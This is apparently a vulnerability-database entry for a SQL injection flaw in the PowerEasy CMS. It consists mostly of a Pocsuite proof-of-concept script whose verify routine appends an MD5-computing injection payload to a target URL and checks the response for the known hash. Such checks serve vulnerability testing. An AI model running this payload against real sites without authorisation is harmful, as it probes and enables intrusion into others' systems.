动力(My Powe)SQL注射漏洞

🗓️ 25 Oct 2008 00:00:00Reported by RootType
动力(My Powe)SQL注射漏洞 on PowerEasy applicatio

                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '4330'  # ssvid
    version = '1.0'
    author = ['zusheng']
    vulDate = ''
    createDate = '2016-04-30'
    updateDate = '2016-04-30'
    references = ['http://www.seebug.org/vuldb/ssvid-4330']
    name = '动力(My Powe)SQL注射漏洞'
    appPowerLink = 'http://www.powereasy.net/'
    appName = 'PowerEasy'
    appVersion = ''
    vulType = 'SQL injection'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']
    #请尽量不要使用第三方库，必要时参考 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md#poc-第三方模块依赖说明 填写该字段

    def _attack(self):
        result = {}
        #Write your code here

        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞计算md5(3.1415)
        result = {}
        #利用的payload
        payload="1 and 1=sys.fn_varbintohexstr(hashbytes('MD5', '3.1415'))--"
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #自定义超时
        time=50
        #构造访问地址
        vulurl=self.url+payload
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=time)
        #判断是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
        if '63e1f04640e83605c1d177544a5a0488' in resp.content:
            #漏洞验证成功
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
25 Oct 2008 00:00Current
7.1High risk
Vulners AI Score7.1